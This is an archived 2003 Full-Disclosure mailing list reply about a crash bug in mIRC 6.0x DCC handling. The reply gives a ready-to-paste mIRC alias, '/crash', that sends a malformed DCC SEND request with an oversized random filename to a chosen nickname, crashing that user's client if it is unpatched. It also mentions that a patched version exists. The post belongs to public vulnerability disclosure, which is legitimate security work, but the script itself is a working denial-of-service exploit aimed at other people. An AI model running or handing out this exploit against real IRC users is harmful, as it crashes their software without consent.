[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-Disclosure] mIRC DCC Exploit
- To: <full-disclosure@lists.netsys.com>
- Subject: Re: [Full-Disclosure] mIRC DCC Exploit
- From: "Nils" <panther-@gmx.de>
- Date: Wed, 15 Oct 2003 09:54:24 +0200
Hi,
Add this to your aliases.ini :
/crash {
.raw PRIVMSG $1 $+(:,$chr(1),DCC) send " $+ $str($rand(a,z) $+ $chr(32),250)
$+ " 0 2130706433 $+(8192,$chr(1))
}
then type : /crash nick
"nick" will crash when vulnerable.
New patched version is avaiable at www.mirc.com .
----- Original Message -----
From: Saint
To: full-disclosure@lists.netsys.com
Sent: Wednesday, October 15, 2003 8:14 AM
Subject: [Full-Disclosure] mIRC DCC Exploit
There is some new bug in mirc6.0x which can crash the prog when sending a
DCC-request(or something). Does anyone know more about this?
thanks
btw, my first post to this group =)
Patrik Nisen
_______________________________________________ Full-Disclosure - We believe
in it. Charter: http://lists.netsys.com/full-disclosure-charter.html